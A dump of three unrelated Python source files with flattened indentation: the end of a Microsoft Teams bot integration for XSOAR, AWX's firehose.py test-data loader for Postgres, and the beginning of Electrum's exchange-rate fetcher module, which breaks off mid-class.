integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
integration_context = {}
try:
integration_context = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except json.decoder.JSONDecodeError as json_decode_error:
demisto.error(
f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
f'{str(json_decode_error)}'
)
demisto.debug(f'Cache object: {integration_context}')
demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
        # Didn't find an existing team, adding a new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
    :param value: Object which includes the user response and the entitlement details
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
demisto.debug('Processing POST query...')
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = get_integration_context()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
set_integration_context(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
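# Simplified, illustrative shape of an inbound Bot Framework activity handled above
# (field names follow the lookups in messages(); all values are examples only):
#   {
#       "serviceUrl": "https://smba.trafficmanager.net/emea/",
#       "channelData": {"tenant": {"id": "<tenant-id>"}, "team": {...}, "channel": {...}},
#       "conversation": {"conversationType": "personal", "id": "<conversation-id>"},
#       "from": {"id": "29:<member-id>", "name": "<display name>"},
#       "text": "<at>Demisto Bot</at> hello"
#   }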
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
        This is a ring only! No media is played if the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = get_integration_context()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
user: list = get_user(username_to_call)
if not (user and user[0].get('id')):
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user[0].get('id')
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
while True:
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
server = None
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
if server:
server.stop()
time.sleep(5)
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
'microsoft-teams-create-meeting': create_meeting_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
return_error(f'{str(e)} - {format_exc()}')
if __name__ == 'builtins':
main()
|
firehose.py
|
#! /usr/bin/env awx-python
#
# !!! READ BEFORE POINTING THIS AT YOUR FOOT !!!
#
# This script attempts to connect to an AWX database and insert (by default)
# a billion main_jobevent rows as screamingly fast as possible.
#
# tl;dr for best results, feed it high IOPS.
#
# this script exists *solely* for the purpose of generating *test* data very
# quickly; do *not* point this at a production installation or you *will* be
# very unhappy
#
# Before running this script, you should give postgres *GOBS* of memory
# and disk so it can create indexes and constraints as quickly as possible.
# In fact, it's probably not smart to attempt this on anything less than 8 cores,
# 32GB of RAM, and tens of thousands of IOPS.
#
# Also, a billion events is a *lot* of data; make sure you've
# provisioned *at least* 750GB of disk space
#
# if you want this script to complete in a few hours, a good starting point
# is something like m5.4xlarge w/ 1TB provisioned IOPS SSD (io1)
#
import argparse
import datetime
import json
import multiprocessing
import pkg_resources
import subprocess
import sys
from io import StringIO
from time import time
from random import randint
from uuid import uuid4
import psycopg2
from django import setup as setup_django
from django.db import connection
from django.db.models.sql import InsertQuery
from django.utils.timezone import now
db = json.loads(
subprocess.check_output(
['awx-manage', 'print_settings', 'DATABASES', '--format', 'json']
)
)
name = db['DATABASES']['default']['NAME']
user = db['DATABASES']['default']['USER']
pw = db['DATABASES']['default']['PASSWORD']
host = db['DATABASES']['default']['HOST']
dsn = f'dbname={name} user={user} password={pw} host={host}'
u = str(uuid4())
STATUS_OPTIONS = ('successful', 'failed', 'error', 'canceled')
class YieldedRows(StringIO):
def __init__(self, job_id, rows, *args, **kwargs):
self.rows = rows
self.row = "\t".join([
"2020-01-02 12:00:00",
"2020-01-02 12:00:01",
"playbook_on_start",
"{}",
'false',
'false',
"localhost",
"Example Play",
"Hello World",
"",
"0",
"1",
job_id,
u,
"",
"1",
"hello_world.yml",
"0",
"X",
"1",
]) + '\n'
def read(self, x):
if self.rows <= 0:
self.close()
return ''
self.rows -= 10000
return self.row * 10000
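# YieldedRows is a minimal file-like object: copy_expert() repeatedly calls read(), and each call
# hands back the same tab-separated row 10,000 times until self.rows is exhausted, so Postgres
# streams the data through COPY ... FROM STDIN without the script materialising it in memory.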
def firehose(job, count):
conn = psycopg2.connect(dsn)
f = YieldedRows(job, count)
with conn.cursor() as cursor:
cursor.copy_expert((
'COPY '
'main_jobevent('
'created, modified, event, event_data, failed, changed, '
'host_name, play, role, task, counter, host_id, job_id, uuid, '
'parent_uuid, end_line, playbook, start_line, stdout, verbosity'
') '
'FROM STDIN'
), f, size=1024 * 1000)
conn.commit()
conn.close()
def cleanup(sql):
print(sql)
conn = psycopg2.connect(dsn)
with conn.cursor() as cursor:
cursor.execute(sql)
conn.commit()
conn.close()
def generate_jobs(jobs, batch_size):
print(f'inserting {jobs} job(s)')
sys.path.insert(0, pkg_resources.get_distribution('awx').module_path)
from awx import prepare_env
prepare_env()
setup_django()
from awx.main.models import UnifiedJob, Job, JobTemplate
fields = list(set(Job._meta.fields) - set(UnifiedJob._meta.fields))
job_field_names = set([f.attname for f in fields])
# extra unified job field names from base class
for field_name in ('name', 'created_by_id', 'modified_by_id'):
job_field_names.add(field_name)
jt_count = JobTemplate.objects.count()
def make_batch(N, jt_pos=0):
jt = None
while not jt:
try:
jt = JobTemplate.objects.all()[jt_pos % jt_count]
except IndexError as e:
# seems to happen every now and then due to some race condition
print('Warning: IndexError on {} JT, error: {}'.format(
jt_pos % jt_count, e
))
jt_pos += 1
jt_defaults = dict(
(f.attname, getattr(jt, f.attname))
for f in JobTemplate._meta.get_fields()
if f.concrete and f.attname in job_field_names and getattr(jt, f.attname)
)
jt_defaults['job_template_id'] = jt.pk
jt_defaults['unified_job_template_id'] = jt.pk # populated by save method
jobs = [
Job(
status=STATUS_OPTIONS[i % len(STATUS_OPTIONS)],
started=now(), created=now(), modified=now(), finished=now(),
elapsed=0., **jt_defaults)
for i in range(N)
]
ujs = UnifiedJob.objects.bulk_create(jobs)
query = InsertQuery(Job)
query.insert_values(fields, ujs)
with connection.cursor() as cursor:
query, params = query.sql_with_params()[0]
cursor.execute(query, params)
return ujs[-1], jt_pos
i = 1
jt_pos = 0
s = time()
while jobs > 0:
s_loop = time()
print('running batch {}, runtime {}'.format(i, time() - s))
created, jt_pos = make_batch(min(jobs, batch_size), jt_pos)
print('took {}'.format(time() - s_loop))
i += 1
jobs -= batch_size
return created
def generate_events(events, job):
conn = psycopg2.connect(dsn)
cursor = conn.cursor()
print('removing indexes and constraints')
# get all the indexes for main_jobevent
try:
# disable WAL to drastically increase write speed
# we're not doing replication, and the goal of this script is to just
# insert data as quickly as possible without concern for the risk of
# data loss on crash
# see: https://www.compose.com/articles/faster-performance-with-unlogged-tables-in-postgresql/
cursor.execute('ALTER TABLE main_jobevent SET UNLOGGED')
cursor.execute("SELECT indexname, indexdef FROM pg_indexes WHERE tablename='main_jobevent' AND indexname != 'main_jobevent_pkey';")
indexes = cursor.fetchall()
cursor.execute("SELECT conname, contype, pg_catalog.pg_get_constraintdef(r.oid, true) as condef FROM pg_catalog.pg_constraint r WHERE r.conrelid = 'main_jobevent'::regclass AND conname != 'main_jobevent_pkey';")
constraints = cursor.fetchall()
# drop all indexes for speed
for indexname, indexdef in indexes:
cursor.execute(f'DROP INDEX IF EXISTS {indexname}')
print(f'DROP INDEX IF EXISTS {indexname}')
for conname, contype, condef in constraints:
cursor.execute(f'ALTER TABLE main_jobevent DROP CONSTRAINT IF EXISTS {conname}')
print(f'ALTER TABLE main_jobevent DROP CONSTRAINT IF EXISTS {conname}')
conn.commit()
print(f'attaching {events} events to job {job}')
cores = multiprocessing.cpu_count()
workers = []
for i in range(cores):
p = multiprocessing.Process(target=firehose, args=(job, events / cores))
p.daemon = True
workers.append(p)
for w in workers:
w.start()
for w in workers:
w.join()
workers = []
print('generating unique start/end line counts')
cursor.execute('CREATE SEQUENCE IF NOT EXISTS firehose_seq;')
cursor.execute('CREATE SEQUENCE IF NOT EXISTS firehose_line_seq MINVALUE 0;')
cursor.execute('ALTER SEQUENCE firehose_seq RESTART WITH 1;')
cursor.execute('ALTER SEQUENCE firehose_line_seq RESTART WITH 0;')
cursor.execute("SELECT nextval('firehose_line_seq')")
conn.commit()
cursor.execute(
"UPDATE main_jobevent SET "
"counter=nextval('firehose_seq')::integer,"
"start_line=nextval('firehose_line_seq')::integer,"
"end_line=currval('firehose_line_seq')::integer + 2 "
f"WHERE job_id={job}"
)
conn.commit()
finally:
# restore all indexes
print(datetime.datetime.utcnow().isoformat())
print('restoring indexes and constraints (this may take a while)')
workers = []
for indexname, indexdef in indexes:
p = multiprocessing.Process(target=cleanup, args=(indexdef,))
p.daemon = True
workers.append(p)
for w in workers:
w.start()
for w in workers:
w.join()
for conname, contype, condef in constraints:
if contype == 'c':
# if there are any check constraints, don't add them back
# (historically, these are > 0 checks, which are basically
# worthless, because Ansible doesn't emit counters, line
# numbers, verbosity, etc... < 0)
continue
sql = f'ALTER TABLE main_jobevent ADD CONSTRAINT {conname} {condef}'
cleanup(sql)
conn.close()
print(datetime.datetime.utcnow().isoformat())
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--jobs', type=int, help='Number of jobs to create.',
default=1000000) # 1M by default
parser.add_argument(
'--events', type=int, help='Number of events to create.',
default=1000000000) # 1B by default
parser.add_argument(
'--batch-size', type=int, help='Number of jobs to create in a single batch.',
default=1000)
params = parser.parse_args()
jobs = params.jobs
events = params.events
batch_size = params.batch_size
print(datetime.datetime.utcnow().isoformat())
created = generate_jobs(jobs, batch_size=batch_size)
generate_events(events, str(created.pk))
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
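# CCY_PRECISIONS maps a currency code to the number of decimal places used when
# formatting fiat amounts; currencies not listed default to 2 (see
# FxThread.ccy_amount_str below). For example, CCY_PRECISIONS.get('JPY', 2) is 0,
# so JPY amounts are displayed without decimals, while USD falls back to 2.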
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
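# Concrete exchanges subclass ExchangeBase below. The minimal contract, as used
# by the base class, is a get_rates() returning {currency_code: Decimal}, plus
# optional history_ccys()/request_history() to enable historical rates. A sketch
# only (the host and fields are hypothetical, not a real exchange):
#
#   class ExampleExchange(ExchangeBase):
#       def get_rates(self, ccy):
#           json = self.get_json('api.example.com', '/ticker')
#           return {'USD': Decimal(json['last'])}
#       def history_ccys(self):
#           return ['USD']
#       def request_history(self, ccy):
#           # must return a dict mapping 'YYYY-MM-DD' strings to rates
#           return self.get_json('api.example.com', '/history')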
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitbank(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('public.bitbank.cc', '/btc_jpy/ticker')
return {'JPY': Decimal(json['data']['last'])}
class BitFlyer(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitflyer.jp', '/api/echo/price')
return {'JPY': Decimal(json['mid'])}
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BTC')
return {ccy: Decimal(rate) for (ccy, rate) in json["data"]["rates"].items()}
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', '/trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
